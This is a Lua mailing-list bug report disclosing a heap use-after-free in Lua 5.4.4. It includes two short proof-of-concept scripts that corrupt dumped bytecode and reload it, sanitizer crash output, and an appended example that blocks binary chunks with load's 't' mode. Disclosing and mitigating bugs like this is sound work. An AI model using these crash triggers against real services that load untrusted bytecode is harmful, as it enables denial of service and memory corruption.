lua-l archive


Hi,

A heap use-after-free is detected in Lua (version 5.4.4, git commit 5d708c3f9cae12820e415d4f89c9eacbe2ab964b; the release version 5.4.4 is also affected).

poc.lua:
---
maybe = string.dump(function() return ({[tr_e]=true})[true] end)
maybe = maybe:gsub('\1\1',']1\2')
maybe = load(maybe)()
---

When built with -fsanitize=address and run as "./lua poc.lua", we get the following crash info:
---
=================================================================
==3588130==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000006d8 at pc 0x5555556d08fa bp 0x7fffffffd490 sp 0x7fffffffd488
READ of size 1 at 0x6170000006d8 thread T0
    #0 0x5555556d08f9 in luaV_execute lua_fuzz/lua/lvm.c:1326:13
    #1 0x5555556739f5 in ccall lua/ldo.c:641:5
    #2 0x5555556739f5 in luaD_callnoyield lua/ldo.c:659:3
    #3 0x55555566e68c in luaD_rawrunprotected lua/ldo.c:144:3
    #4 0x5555556753f4 in luaD_pcall  lua/ldo.c:957:12
    #5 0x55555565e6da in lua_pcallk  lua/lapi.c:1064:14
    #6 0x55555564fdc3 in docall  lua/lua.c:160:12
    #7 0x55555564ef32 in handle_script  lua/lua.c:256:14
    #8 0x55555564ef32 in pmain  lua/lua.c:645:9
---

Without ASan it prints the following:
---
./lua/lua: ./poc.lua:1: table index is nil
stack traceback:
        ./poc.lua:1: in function <./poc.lua:1>
        ./poc.lua:3: in main chunk
        [C]: in ?
---

A variant PoC can trigger a crash in a default build without ASan:
---
ma0be=string.dump(
    function()
        return({[e]=true})[true]end)
ma0be=ma0be:gsub('\1\1','')
m=load(ma0be)((0)and 0)
---

--
Best Wishes,
Yongheng Chen
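The PoCs above all work by feeding a hand-corrupted binary chunk (the output of string.dump after a gsub) back into load. Lua's reference manual is explicit that the interpreter does not verify bytecode, so any program that loads chunks from an untrusted source should refuse binary chunks outright. The following example is added here and is not part of the report or of the Lua distribution; it shows the standard mitigation, the "t" mode argument of load, applied to a harmless constructed bytecode sample (function names, chunk names and the empty environment table are my own choices).

```lua
-- Added example (not from the original post): only accept textual chunks from
-- untrusted input. The Lua VM does not validate bytecode, so a corrupted dump
-- can crash the interpreter; load()'s mode argument "t" makes load() return
-- nil plus an error message for anything that is not source text.

local function load_text_only(chunk, name)
  -- mode "t": textual chunks only. A binary chunk (one starting with "\27Lua")
  -- is rejected before any parsing or execution happens.
  -- The empty table as env gives the chunk no access to globals (assumption:
  -- the caller wants a sandboxed chunk; pass _G or a curated table otherwise).
  return load(chunk, name or "=untrusted", "t", {})
end

-- Constructed sample: a harmless function dumped to bytecode. Even this
-- uncorrupted dump is refused, because the check is on the chunk kind, not on
-- its contents.
local bin = string.dump(function() return 1 + 1 end)
local f, err = load_text_only(bin, "=binary-sample")
assert(f == nil, "binary chunk must be rejected")
print("binary chunk rejected: " .. tostring(err))
-- prints: binary chunk rejected: attempt to load a binary chunk (mode is 't')

-- A textual chunk is still accepted and runs normally.
local g = assert(load_text_only("return 1 + 1", "=text-sample"))
assert(g() == 2)
print("text chunk ok: " .. tostring(g()))
```

Loading bytecode should be reserved for chunks the program produced itself and stored in a location it trusts; for everything else, the "t" mode turns a memory-safety crash like the one reported above into an ordinary, catchable load error.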